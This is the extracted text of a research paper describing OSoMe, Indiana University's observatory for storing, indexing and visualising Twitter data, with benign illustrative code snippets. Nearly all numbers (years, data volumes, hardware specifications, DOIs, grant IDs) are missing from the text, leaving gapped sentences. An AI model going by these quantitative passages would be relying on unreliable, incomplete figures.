oulasvirta & eagle, ; healy & moody, ), and intuitive user interfaces are becoming more ubiquitous, many tasks remain challenging enough to hinder research advances. 
this is especially true for those tasks related to the application of fast visualization techniques. a third, important limitation is related to user privacy. unfettered access to sensitive, private data about the choices, behaviors, and preferences of individuals is happening at an increasing rate (tene & polonetsky, ). coupled with the possibility to manipulate the environment presented to users (kramer, guillory & hancock, ), this has raised in more than one occasion deep ethical concerns in both the public and the scientific community (kahn, vayena & mastroianni, ; fiske & hauser, ; harriman & patel, ; vayena et al., ). these limitations point to a critical need for opening social media platforms to researchers in ways that are both respectful of user privacy requirements and aware of the needs of sbe researchers. in the absence of such systems, sbe researchers will have to increasingly rely on closed or opaque data sources, making it more difficult to reproduce and replicate findings—a practice of increasing concern given recent findings about replicability in the sbe sciences (open science collaboration, ). our long-term goal is to enable sbe researchers and the general public to openly access relevant social media data. as a concrete milestone of our project, here we present an observatory on social media—an open infrastructure for sharing public data about information that is spread and collected through online social networks. our initial focus has been on twitter as a source of public microblogging posts. the infrastructure takes care of storing, indexing, and analyzing public collections and historical archives of big social data; it does so in an easy-to-use way, enabling broad access from scientists and other stakeholders, like journalists and the general public. we envision that data and analytics from social media will be integrated within a nation-wide network of social observatories. these data centers would allow access to a broad range of data about social, behavioral, and economic phenomena nationwide (king, ; moran et al., ; difranzo et al., ). our team has been working toward this vision since , when we started collecting public tweets to visualize, analyze, and model meme diffusion networks. the iuni observatory on social media (osome) presented here was launched in early may . it was developed through a collaboration between the indiana university network science institute (iuni, iuni.iu.edu), the iu school of informatics and computing (soic, soic.indiana.edu), and the center for complex networks and systems research (cnets, cnets.indiana.edu). it is available at osome.iuni.iu.edu. data source social media data possess unique characteristics. besides rich textual content, explicit information about the originating social context is generally available. information often includes timestamps, geolocations, and interpersonal ties. the twitter dataset is davis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://truthy.indiana.edu https://peerj.com http://iuni.iu.edu http://soic.indiana.edu http://cnets.indiana.edu http://osome.iuni.iu.edu http://dx.doi.org/ . /peerj-cs. research based on this data was deemed exempt from review by the indiana university irb under protocol # . a prototypical example (mckelvey & menczer, b; mckelvey & menczer, a). the observatory on social media is built around a terabyte-scale historical (and ongoing) collection of tweets. 
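each message in such a collection carries, besides its text, the contextual metadata mentioned above (timestamps, geolocation, and interpersonal ties such as retweets and mentions). the record below is a simplified, illustrative view of that structure, loosely following the field names of the twitter api of that period; it is abbreviated and not an exact schema.

```python
# Abbreviated, illustrative tweet record (not an exact Twitter schema).
tweet = {
    "id_str": "123456789012345678",
    "created_at": "Wed Jan 27 05:57:00 +0000 2016",   # timestamp
    "text": "so much #snow this morning",
    "user": {"id_str": "42", "screen_name": "example_user"},
    "coordinates": {"type": "Point", "coordinates": [-86.53, 39.17]},  # lon, lat
    "entities": {
        "hashtags": [{"text": "snow"}],
        "user_mentions": [],                           # interpersonal ties
    },
    "retweeted_status": None,  # nested tweet object when this is a retweet
}
```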
the data source is a large sample of public posts made available by twitter through elevated access to their streaming api, granted to a number of academic labs. all of the tweets from this sample are stored, resulting in a corpus of approximately billion public tweets dating back to mid- . an important caveat about the use of these data for research is that possible sampling biases are unknown. when twitter first made this stream available to the research community, it indicated that the stream contains a random % sample of all public tweets. however, no further information about the sampling method was disclosed. other streaming apis have been shown to provide a non-uniform sample (morstatter et al., ). even assuming that tweets are randomly sampled, it should be noted that the collection does not automatically translate into a representative sample of the underlying population of twitter users, or of the topics discussed. this is because the distribution of activity is highly skewed across users and topics (weng et al., ) and, as a result, active users and popular topics are better represented in the sample. sampling biases may also have evolved over time. for example, the fraction of public tweets with exact geolocation coordinates has decreased from approximately % in the past to approximately . % due to the recent change of location privacy settings in twitter mobile clients from ‘‘opt-out’’ to ‘‘opt-in.’’ this change was motivated by public privacy concerns about location tracking. this and other platform changes may significantly affect the composition of our sample in ways that we are unable to assess. the high-speed stream from which the data originates has a rate that ranges in the order of − tweets/day. figure illustrates the growth of the twitter collection over time. system architecture performing analytics at this scale presents specific challenges. the most obvious has to do with the design of a suitable architecture for processing such a large volume of data. this requires a scalable storage substrate and efficient query mechanisms. the core of our system is based on a distributed storage cluster composed of compute nodes, each with × tb disk drives, × gb raid- drives for the operative system, gb ram, and × xeon cpus with cores each ( total per node). access to the nodes is provided via two head nodes, each equipped with gb ram, and ×xeon cpus with four cores each ( total per node), using gb ethernet infiniband. the software architecture the observatory builds upon the apache big data stack (abds) framework (jha et al., ; qiu et al., ; fox et al., ). development has been driven over the years by the need for increasingly demanding social media analytics applications (gao, nachankar & qiu, ; gao & qiu, ; gao & qiu, ; gao et al., ; gao, ferrara & qiu, ; wu et al., in press). a key idea behind our enhancement of the abds architecture is the shift from standalone systems to modules; multiple modules can be used within existing software ecosystems. in particular, we have focused our efforts on enhancing two well-known apache modules, hadoop (the apache software foundation, b) and hbase (the apache software foundation, a). davis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure number of monthly messages collected and indexed by osome. system failures have caused occasional interruptions of the collection system. the architecture is illustrated in fig. . 
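to picture how an hbase table can be turned into a text-plus-time index for this kind of workload, one common pattern is to embed the query term and the tweet timestamp directly in the row key, so that a time-bounded lookup becomes a single range scan. the sketch below uses the happybase client with an invented table and column layout; it illustrates the general pattern only, not the actual schema used by the system.

```python
import happybase

conn = happybase.Connection("hbase-master.example.org")  # hypothetical host
index = conn.table("hashtag_time_index")                 # hypothetical table

def index_tweet(hashtag, timestamp_ms, tweet_id):
    """Row key = hashtag + zero-padded timestamp, so rows for one hashtag
    are stored contiguously in time order."""
    row = f"{hashtag.lower()}#{timestamp_ms:013d}".encode()
    index.put(row, {b"t:id": str(tweet_id).encode()})

def tweet_ids(hashtag, start_ms, end_ms):
    """Range scan over the embedded time interval for one hashtag."""
    start = f"{hashtag.lower()}#{start_ms:013d}".encode()
    stop = f"{hashtag.lower()}#{end_ms:013d}".encode()
    return [data[b"t:id"].decode()
            for _, data in index.scan(row_start=start, row_stop=stop)]
```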
the data collection system receives data from the twitter streaming api. data are first stored on a temporary location and then loaded into the distributed storage layer on a daily basis. at the same time, long-term backups are stored on tape to allow recovery in case of data loss or catastrophic events. the design of the nosql distributed db module was guided by the observation that queries of social media data often involve unique constraints on the textual and social context such as temporal or network information. to address this issue, we leveraged the hbase system as the storage substrate and extended it with a flexible indexing framework. the resulting indexedhbase module allows one to define fully customizable text index structures that are not supported by current state-of-the-art text indexing systems, such as solr (the apache software foundation, c). the custom index structures can embed contextualinformation necessaryfor efficientquery evaluation. theindexedhbase software is publicly available (wiggins, gao & qiu, ). the pipelines commonly used for social media data analysis consist of multiple algorithms with varying computation and communication patterns. for example, building the network of retweets of a given hashtag will take more time and computational resources than just counting the number of posts containing the hashtag. moreover, the temporal resolution and aggregation windows of the data could vary dramatically, from seconds to years. a number of different processing frameworks could be needed to perform such a wide range of tasks. to design the analytics module of the observatory we choose hadoop, a standard framework for big data analytics. we use yarn (the apache software foundation, d) to achieve efficient execution of the whole pipeline, and integrate it with indexedhbase. an advantage deriving from this choice is that the overall software stack can dynamically adopt different processing frameworks to complete heterogeneous tasks of variable size. a distributed task queue, and an in-memory key/value store implement the middleware layer needed to submit queries to the backend of the observatory. we use celery (solem & davis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure flowchart diagram of the osome architecture. arrows indicate flow of data. contributors, ) and redis (sanfilippo, ) to implement such layer. the task queue limits the number of concurrent jobs processed by the system according to the task type (index-only vs. map/reduce) to prevent extreme degradation of performance due to very high load. the observatory user interface follows a modular architecture too, and is based on a number of apps, which we describe in greater detail in the following section. three of the apps (timeline, network visualization, and geographic maps) are directly accessible within osome through web interfaces. we rely on the popular video-sharing service youtube for the fourth app, which generates meme diffusion movies (videos). the movies are rendered using a fast dynamic visualization algorithm that we specifically designed for temporal networks. the algorithm captures only the most persistent trends in the temporal evolution, at the expense of high-frequency churn (grabowicz, aiello & menczer, ). the software is freely available (grabowicz & aiello, ). finally, the observatory provides access to raw data via a programmatic interface (api). 
applications storing and indexing tens of billions of tweets is of course pointless without a way to make sense of such a huge trove of information. the observatory lowers the barrier of entry to social media analysis by providing users with several ready-to-use, web-based data visualization tools. visualization techniques allow users to make sense of complex data davis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure number of tweets per day about the super bowl (in blue) and the world series (in orange), from september through february . the y -axis is in logarithmic scale, shifted by one to account for null counts. the plot shows two outages in the data collection that occurred around mid-november and mid-january . and patterns (card, ), and let them explore the data and try different visualization parameters (rafaeli, ). in the following, we give a brief overview of the available tools. it is important to note that, in compliance with the twitter terms of service (twitter, inc., ), osome does not provide access to the content of tweets, nor of twitter user objects. however, researchers can obtain numeric object identifiers of tweets in response to their queries. this information can then be used to retrieve tweet content via the official twitter api. (there is one exception, described below.) another necessary step to comply with the twitter terms is to remove deleted tweets from the database. using a redis queue, we collect deletion notices from the public twitter stream, and then feed them to a backend task for deletion. temporal trends the trends tool produces time series plots of the number of tweets including one or more given hashtags; it can be compared to the service provided by google trends, which allows users to examine the interest toward a topic reflected by the volume of search queries submitted to google over time. users may specify multiple terms in one query, in which case all tweets containing any of the terms will be computed; and they can perform multiple queries, to allow comparisons between different topics. for example, let us compare the relative tweet volumes about the world series and the superbowl. we want our super bowl timeline to count tweets containing any of #superbowl, #superbowl , or #sb . since hashtags are case-insensitive and we allow trailing wildcards, this query would be ‘‘ #superbowl*, #sb .’’ adding a timeline for the ‘‘ #worldseries’’ query results in the plot seen in fig. . each query on the trends tool takes – s; this makes the tool especially suitable for interactive exploration of twitter conversation topics. davis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. diffusion and co-occurrence networks in a diffusion network, nodes represent users and an edge drawn between any two nodes indicates an exchange of information between those two users. for example, a user could rebroadcast (retweet) the status of another user to her followers, or she could address another user in one of her statuses by including a mention to their user handle (mention). edges have a weight to represent the number of messages connecting two nodes. they may also have an intrinsic direction to represent the flow of information. for example, in the retweet network for the hashtag #icebucketchallenge, an edge from user i to user j indicates that j retweeted tweets by i containing the hashtag #icebucketchallenge. 
similarly, in a mention network, an edge from i to j indicates that i mentioned j in tweets containing the hashtag. information diffusion network, sometimes also called information cascades, have been the subject of intense study in recent years (gruhl et al., ; weng et al., ; bakshy et al., ; weng et al., ; weng, menczer & ahn, ; romero, meeder & kleinberg, ). another type of network visualizes how hashtags co-occur with each other. co- occurrence networks are also weighted, but undirected: nodes represent hashtags, and the weight of an edge between two nodes is the number of tweets containing both of those hashtags. osome provides two tools that allow users to explore diffusion and and co-occurrence networks. interactive network visualization the networks tool enables the visualization of how a given hashtag spreads through the social network via retweets and mentions (fig. ) or what hashtags co-occur with a given hashtag. the resulting network diagrams, created using a force-directed layout (kamada & kawai, ), can reveal topological patterns such as influential or highly-connected users and tightly-knit communities. users can click on the nodes and edges to find out more information about the entities displayed—users, tweets, retweets, and mentions—directly from twitter. network are cached to enable fast access to previously-created visualizations. for visualization purposes, the size of large networks is reduced by extracting their k-core (alvarez-hamelin et al., ) with k sufficiently large to display , nodes or less (k= in the example of fig. ). the use of this type of filter implies a bias toward densely connected portions of diffusion networks, where most of the activity occurs, and toward the most influential participants. the tool allows access to twitter content, such as hashtags and user screen names. this content is available both through the interactive interface itself, and as a downloadable json file. to comply with the twitter terms, the k-core filter also limits the number of edges (tweets). animations because tweet data are time resolved, the evolution of a diffusion or co-occurrence network can be also visualized over time. currently the networks tool visualizes only static networks aggregated over the entire search period specified by the user; we aim to add the ability to observe the network evolution over time, but in the meantime we also provide the movies davis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure interactive network visualization tool. a detail of the network of retweets and mention for a hashtag commonly linked to ‘‘ice bucket challenge,’’ a popular internet phenomenon from . the size of a node is proportional to its strength (weighted degree). the detail shows the patterns of mention and information broadcasting occurring between celebrities, as the viral challenge was taking off. tool, an alternative service that lets users generate animations of such processes (fig. ). we have successfully experimented with fast visualization techniques in the past, and have found that edge filtering is the best approach for efficiently visualizing networks that undergo a rapid churn of both edges and nodes. we have therefore deployed a fast filtering algorithm developed by our team (grabowicz, aiello & menczer, ). the user-generated videos are uploaded to youtube, and we cache the videos in case multiple users try to visualize the same network. 
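the k-core reduction used by the networks tool above can be sketched with networkx as follows: the core order k is increased until the filtered diffusion network is small enough to display. the node budget used here is an arbitrary placeholder, not the exact cut-off applied by osome.

```python
# sketch of the k-core reduction used to shrink large diffusion networks before
# visualization; the node budget is an arbitrary placeholder
import networkx as nx

def kcore_filter(graph, max_nodes=1000):
    """return (k, core) where core is the smallest-k core with at most max_nodes nodes"""
    g = nx.Graph(graph)
    g.remove_edges_from(nx.selfloop_edges(g))  # k_core requires a graph without self-loops
    k, core = 0, g
    while core.number_of_nodes() > max_nodes:
        k += 1
        core = nx.k_core(g, k)
    return k, core

# toy example: reduce a synthetic scale-free network to a displayable core
g = nx.barabasi_albert_graph(5000, 3)
k, core = kcore_filter(g, max_nodes=1000)
print(k, core.number_of_nodes())
```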
geographic maps online social networks are implicitly embedded in space, and the spatial patterns of information spread have started to be investigated in recent years (ferrara et al., ; conover et al., a). the maps tool enables the exploration of information diffusion through geographic space and time. a subset of tweets contain exact latitude/longitude coordinates in their metadata. by aggregating these coordinates into a heatmap layer superimposed on a world map, one can observe the geographic signature of the attention being paid to a given meme. figure shows an example. our online tool goes one step further, allowing the user to explore how this geographic signature evolves over a specified time period, via a slider widget. it takes at least s to prepare one of these visualizations ex novo. we hope to reduce this lead time with some backend indexing improvements. to enable exploration, we cache all created heatmaps for a period of one week. while cached, the heatmaps can be davis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure temporal information diffusion movies. (a) the interface of the movies tool let users specify a hashtag, a temporal interval, and the type of diffusion ties to visualize (retweets, mentions, or hashtag co-occurrence). (b) example of a generated movie frame, showing a retweet network for the # icebucketchallenge hashtag. youtube: https://www.youtube.com/watch?v=nzkhrtpciyu. figure heatmap of tweets containing the hashtag #snow on january , , the day of a large snowstorm over the eastern united states. davis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.youtube.com/watch?v=nzkhrtpciyu http://dx.doi.org/ . /peerj-cs. retrieved instantly, enabling other users to browse and interact with these previously-created visualizations. in the future we hope to experiment with overlaying diffusion networks on top of geographical maps, for example using multi-scale backbone extraction (serrano, boguná & vespignani, ) and edge bundling techniques (selassie, heller & heer, ). an important caveat for the use of the maps tool is that it is based on the very small percentage of tweets that contain exact geolocation coordinates. furthermore, as already discussed, this percentage has changed over time. api we expect that the majority of users of the observatory will interact with its data primarily through the tools described above. however, since more advanced data needs are to be expected, we also provide a way to export the data for those who wish to create their own visualizations and develop custom analyses. this is possible either within the tools, via export buttons, and through a read-only http api. the osome api is deployed via the mashape management service. four public methods are currently available. each takes as input a time interval and a list of tokens (hashtags and/or usernames): • tweet-id: returns a list of tweet ids mentioning at least one of the inputs in the given interval; • counts: returns a count of the number of tweets mentioning each input token in the given interval; • time-series: for each day in the given time interval, returns a count of tweets matching any of the input tokens; • user-post-count: returns a list of user ids mentioning any of the tokens in the given time frame, along with a count of matching tweets produced by each user. 
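as an illustration of how the read-only http api above could be consumed, the sketch below wraps the time-series method with the requests library. the base url, path and parameter names are placeholders, not the documented osome endpoints.

```python
# sketch of a client for the read-only http api; the base url, path and parameter
# names are placeholders and not the documented endpoints
import requests

BASE_URL = 'https://osome-api.example.org'  # hypothetical endpoint

def time_series(tokens, start, end):
    """daily counts of tweets matching any of the given hashtags/usernames in [start, end]"""
    response = requests.get(f'{BASE_URL}/time-series',
                            params={'tokens': ','.join(tokens),
                                    'start': start,
                                    'end': end},
                            timeout=60)
    response.raise_for_status()
    return response.json()

# example usage with placeholder dates
series = time_series(['#icebucketchallenge'], '2014-08-01', '2014-09-01')
```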
evaluation

in the first several weeks since launch, the osome infrastructure has served a large number of requests, as shown in fig. . the spike corresponds to may , the date of a press release about the launch. most of these requests complete successfully, with no particular deterioration for increasing loads (fig. ).

figure: number of daily requests to the observatory, including both api calls and interactive queries; the inset shows the same data on a logarithmic scale.
figure: fraction of successful requests as a function of daily request load; error bars are standard errors within logarithmic bins.

to evaluate the scalability of the hadoop-based analytics tools with increasing data size, we plot in fig. the run time of queries submitted by users through osome interactive tools, as a function of the number of tweets matching the query parameters. we observe a sublinear growth, suggesting that the system scales well with job size. a job may take from seconds to several hours depending on many factors such as system load and number of tweets processed. however, even different queries that process the same number of tweets may perform differently, depending on the width of the query time window. this is partly due to "hotspotting": the temporal locality of our data layout across the nodes of the storage cluster causes decreases in performance when different hadoop mappers access the same disks. a query spanning a short period of time runs slower than one matching the same number of tweets over a longer period. these results suggest that our data layout design may need to be reconsidered in future development. an alternative approach to improve performance of queries is to entirely remove the bottleneck of hadoop processing by indexing additional data. for example, in the networks and movies tools, we could index the retweet and mention edges. the resulting queries would utilize the indices only, resulting in response times comparable to those of the trends tool.

figure: run time versus number of tweets processed by hadoop-based interactive tools; the line is a guide for the eye corresponding to linear growth.

finally, we tested the scalability of queries that use the hbase index under increasing load. figure shows that the total run time is not strongly affected by the number of concurrent jobs, up to the size of the task queue. for larger loads, run time scales linearly as expected.

figure: run time versus number of concurrent jobs that use the hbase index; the line is a guide for the eye representing linear growth.

conclusion

the iuni observatory on social media is the culmination of a large collaborative effort at indiana university that took place over the course of six years. we hope that it will facilitate computational social science and make big social data easier to analyze by a broad community of researchers, reporters, and the general public. the lessons learned during the development of the infrastructure may be helpful for future endeavors to foster data-intensive research in the social, behavioral, and economic sciences. we welcome feedback from researchers and other end users about usability and usefulness of the tools presented here.
in the future, we plan to carry out user studies and tutorial workshops to gain feedback on effectiveness of the user interfaces, efficiency of the tools, and desirable extensions. we encourage the research community to create new social media analytic tools by building upon our system. as an illustration, we created a mashup of the osome api with the botornot api (davis et al., ), also developed by our team, to evaluate the extent to which twitter campaigns are sustained by social bots. the software is freely available online (davis, ). the opportunities that arise from the observatory, and from computational social science in general, could have broad societal impact. systematic attempts to mislead the public on a large scale through ‘‘astroturf’’ campaigns and social bots have been uncovered using big social data analytics, inspiring the development of machine learning methods to detect these abuses (ratkiewicz et al., a; ferrara et al., ; subrahmanian et al., ). allowing citizens to observe how memes spread online may help raise public awareness of the potential dangers of social media manipulation. acknowledgements the authors would like to acknowledge alessandro vespignani and johan bollen for discussions leading to the early vision of an observatory on social media; and rob henderson, shing-shong (bruce) shei, gary miksik, allan streib, and koji tanaka for their kind assistance with system administration. we are deeply grateful to twitter for supporting computational social science research, including the efforts described in this paper, by granting our lab elevated access to the public stream of tweets. any opinions, findings, and conclusions or recommendations expressed in this material are those of the author(s) and do not necessarily reflect the views of the funding agencies. additional information and declarations funding this work was supported in part by nsf (grants ccf- and oci- ), the j.s. mcdonnell foundation (grant ), the swiss national science foundation (fellowship pbtip _ ), the lilly endowment, the center for complex networks and systems research (cnets), the digital science center (dsc), and the indiana university davis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. network science institute (iuni). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: nsf: ccf- , oci- . j.s. mcdonnell foundation: pbtip _ . lilly endowment, the center for complex networks and systems research. digital science center. indiana university network science institute. competing interests filippo menczer is an academic editor for peerj computer science. xiaoming gao is an employee of facebook; luca maria aiello is an employee of bell labs; snehal patil is an employee of yahoo!; mike conover is an employee of linkedin; mark meiss, jacob ratkiewicz, and alex rudnick are employees of google; lilian weng is an employee of affirm; and tak-lon wu is an employee of amazon. author contributions • clayton a. davis and giovanni luca ciampaglia wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • luca maria aiello, keychul chung, michael d. conover, emilio ferrara, xiaoming gao, bruno gonçalves, przemyslaw a. grabowicz, kibeom hong, pik-mai hui, scott mccaulay, karissa mckelvey, mark r. 
meiss, snehal patil, chathuri peli kankanamalage, jacob ratkiewicz, alex rudnick, prashant shiralkar, onur varol, lilian weng, tak-lon wu and andrew j. younge performed the computation work, reviewed drafts of the paper. • alessandro flammini, geoffrey c. fox, valentin pentchev and judy qiu reviewed drafts of the paper. • benjamin serrette prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • filippo menczer wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. ethics the following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): this study was deemed exempt from review by the indiana university irb office under protocol # . data availability the following information was supplied regarding data availability: data from the osome are available through an api and through interactive apps. use of the data is subject to the terms of the twitter developer agreement davis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. (https://dev.twitter.com/overview/terms/agreement). for more information please visit: http://osome.iuni.iu.edu/. it is important to note that, in compliance with the twitter terms of service (https://dev.twitter.com/overview/terms/policy), osome does not provide access to the content of tweets. however, researchers can obtain numeric object identifiers in response to their queries. this information can then be used to retrieve tweet content via the official twitter api. references alvarez-hamelin ji, dall’asta l, barrat a, vespignani a. . large scale networks fingerprinting and visualization using the k-core decomposition. in: advances in neural information processing systems (nips). cambridge: mit press, – . andalibi n, ozturk p, forte a. . depression-related imagery on instagram. in: proc. th acm conference companion on computer supported cooperative work & social computing (cscw). new york: acm, – . antenucci d, cafarella m, levenstein m, ré c, shapiro md. . using social media to measure labor market flows. working paper . national bureau of economic research doi . /w . backstrom l, boldi p, rosa m, ugander j, vigna s. . four degrees of separation. in: proceedings of the th annual acm web science conference websci ’ . new york: acm, – . bakshy e, rosenn i, marlow c, adamic l. . the role of social networks in informa- tion diffusion. in: proceedings of the st acm international conference on world wide web. new york: acm, – . bollen j, mao h, zeng x. . twitter mood predicts the stock market. journal of computational science ( ): – doi . /j.jocs. . . . card s. . information visualization. in: human–computer interaction: design issues, solutions, and applications. boca raton: crc press, – . choi h, varian h. . predicting the present with google trends. economic record (s ): – doi . /j. - . . .x. ciampaglia gl, flammini a, menczer f. . the production of information in the attention economy. scientific reports :article doi . /srep . conover m, davis c, ferrara e, mckelvey k, menczer f, flammini a. a. the geospatial characteristics of social movement communication networks. plos one ( ):e doi . /journal.pone. . conover m, ferrara e, menczer f, flammini a. b. the digital evolution of occupy wall street. plos one ( ):e doi . /journal.pone. . conover md, gonçalves b, flammini a, menczer f. . partisan asymmetries in online political activity. epj data science : doi . /epjds . 
conover m, gonçalves b, ratkiewicz j, flammini a, menczer f. a. predicting the political alignment of twitter users. in: proceedings of the rd ieee conference on social computing (socialcom). piscataway: ieee. davis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://dev.twitter.com/overview/terms/agreement http://osome.iuni.iu.edu/ https://dev.twitter.com/overview/terms/policy http://dx.doi.org/ . /w http://dx.doi.org/ . /j.jocs. . . http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /srep http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /epjds http://dx.doi.org/ . /peerj-cs. conover m, ratkiewicz j, francisco m, gonçalves b, flammini a, menczer f. b. political polarization on twitter. in: proceedings of the th international aaai conference on weblogs and social media (icwsm). palo alto: aaai. davis ca. . osome mashups. available at https://github.com/iunetsci/osome- mashups/ (accessed on july ). davis ca, varol o, ferrara e, flammini a, menczer f. . botornot: a system to evaluate social bots. proceedings of the www developers day workshop. arxiv preprint. arxiv: . . de choudhury m, gamon m, counts s, horvitz e. . predicting depression via social media. in: proceedings of the th international aaai conf. on weblogs and social media (icwsm). palo alto: aaai. difranzo d, erickson js, gloria mjkt, luciano js, mcguinness dl, hendler j. . the web observatory extension: facilitating web science collaboration through semantic markup. in: proceedings of the rd intl. conference on world wide web companion, – . digrazia j, mckelvey k, bollen j, rojas f. . more tweets, more votes: social media as a quantitative indicator of political behavior. plos one ( ):e doi . /journal.pone. . einav l, levin j. . economics in the age of big data. science ( ): – doi . /science. . ferrara e, varol o, davis c, menczer f, flammini a. . the rise of social bots. communications of the acm ( ): – doi . / . ferrara e, varol o, menczer f, flammini a. . traveling trends: social butterflies or frequent fliers? in: proceedings of the st acm conference on online social networks (cosn). new york: acm, – . fiske st, hauser rm. . protecting human research participants in the age of big data. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . fox gc, jha s, qiu j, luckow a. . towards an understanding of facets and exem- plars of big data applications. in: proceedings of years of beowulf: workshop to honor thomas sterling’s th birthday, – . gao x, ferrara e, qiu j. . parallel clustering of high-dimensional social media data streams. in: proceedings of the th ieee/acm international symposium on cluster, cloud and grid computing (ccgrid). piscataway: ieee, – . gao x, nachankar v, qiu j. . experimenting lucene index on hbase in an hpc environment. in: proceedings of acm high performance computing meets databases workshop (hpcdb’ ) at supercomputing . new york: acm, – . gao x, qiu j. . supporting end-to-end social media data analysis with the indexed- hbase platform. in: proceedings of the th workshop on many-task computing on clouds, grids, and supercomputers (mtags) at sc . gao x, qiu j. . supporting queries and analyses of large-scale social media data with customizable and scalable indexing techniques over nosql databases. in: davis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/iunetsci/osome-mashups/ https://github.com/iunetsci/osome-mashups/ http://arxiv.org/abs/ . 
http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /science. http://dx.doi.org/ . / http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /peerj-cs. proceedings of the th ieee/acm international symposium on cluster, cloud and grid computing (ccgrid ). piscataway: ieee, – . gao x, roth e, mckelvey k, davis c, younge a, ferrara e, menczer f, qiu j. . supporting a social media observatory with customizable index structures: archi- tecture and performance. in: cloud computing for data intensive applications. berlin heidelberg: springer, – . grabowicz pa, aiello lm. . fastviz. available at https://github.com/wici/fastviz (accessed on july ). grabowicz pa, aiello lm, menczer f. . fast filtering and animation of large dy- namic networks. epj data science ( ): – doi . /epjds/s - - - . gruhl d, guha r, liben-nowell d, tomkins a. . information diffusion through blogspace. in: proceedings of the th international acm conference on world wide web, www ’ , – . guille a, hacid h, favre c, zighed da. . information diffusion in online social networks. sigmod record ( ): – doi . / . . hargittai e. . is bigger always better? potential biases of big data derived from social network sites. the annals of the american academy of political and social science ( ): – doi . / . harriman s, patel j. . the ethics and editorial challenges of internet-based research. bmc medicine : doi . /s - - - . healy k, moody j. . data visualization in sociology. annual review of sociology : – doi . /annurev-soc- - . jha s, qiu j, luckow a, mantha p, fox gc. . a tale of two data-intensive paradigms: applications, abstractions, and architectures. in: proceedings of the rd international congress on big data conference (ieee bigdata). piscataway: ieee. kahn jp, vayena e, mastroianni ac. . opinion: learning as we go: lessons from the publication of facebook’s social-computing research. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . kamada t, kawai s. . an algorithm for drawing general undirected graphs. information processing letters ( ): – doi . / - ( ) - . king g. . ensuring the data-rich future of the social sciences. science ( ): – doi . /science. . kramer ad, guillory je, hancock jt. . experimental evidence of massive-scale emotional contagion through social networks. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . lazer d, pentland a, adamic l, aral s, barabási a-l, brewer d, christakis n, contrac- tor n, fowler j, gutmann m, jebara t, king g, macy m, roy d, van alstyne m. . computational social science. science ( ): – doi . /science. . davis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/wici/fastviz http://dx.doi.org/ . /epjds/s - - - http://dx.doi.org/ . / . http://dx.doi.org/ . / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /annurev-soc- - http://dx.doi.org/ . /pnas. http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . /science. http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /science. http://dx.doi.org/ . /peerj-cs. link bg, phelan jc, bresnahan m, stueve a, pescosolido ba. . public conceptions of mental illness: labels, causes, dangerousness, and social distance. american journal of public health ( ): – doi . /ajph. . . . mckelvey k, menczer f. a. design and prototyping of a social media observatory. in: proceedings of the nd international conference on world wide web (www) companion, – . mckelvey k, menczer f. b. truthy: enabling the study of online social networks. 
in: proc. th acm conference on computer supported cooperative work and social computing companion (cscw). new york: acm. moran ef, hofferth sl, eckel cc, hamilton d, entwisle b, aber jl, brady he, conley d, cutter sl, hubacek k, scholz jt. . opinion: building a st-century infrastructure for the social sciences. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . morstatter f, pfeffer j, liu h, carley km. . is the sample good enough? comparing data from twitter’s streaming api with twitter’s firehose. in: proceedings of the th international aaai conference on weblogs and social media (icwsm). new york: acm. nematzadeh a, ferrara e, flammini a, ahn y-y. . optimal network modularity for information diffusion. physical review letters : doi . /physrevlett. . . open science collaboration. . estimating the reproducibility of psychological science. science ( ):aac doi . /science.aac . qiu j, jha s, luckow a, fox gc. . towards hpc-abds: an initial high-performance big data stack. in: proceedings of st acm big data interoperability framework workshop: building robust big data ecosystem. new york: acm. raento m, oulasvirta a, eagle n. . smartphones: an emerging tool for social scien- tists. sociological methods & research ( ): – doi . / . rafaeli s. . interactivity: from new media to communication. sage annual review of communication research: advancing communication science (ca): – . ratkiewicz j, conover m, meiss m, gonçalves b, flammini a, menczer f. a. detecting and tracking political abuse in social media. in: proceedings of the th international aaai conf. on weblogs and social media (icwsm). palo alto: aaai. ratkiewicz j, conover m, meiss m, gonçalves b, patil s, flammini a, menczer f. b. truthy: mapping the spread of astroturf in microblog streams. in: proceedings th international world wide web conference companion (www). romero dm, meeder b, kleinberg j. . differences in the mechanics of information diffusion across topics: idioms, political hashtags, and complex contagion on twitter. in: proceedings of the th international conference on world wide web (www), – . ruths d, pfeffer j. . social media for large studies of behavior. science ( ): – doi . /science. . . . sanfilippo s. . redis. available at http://redis.io/ (accessed on 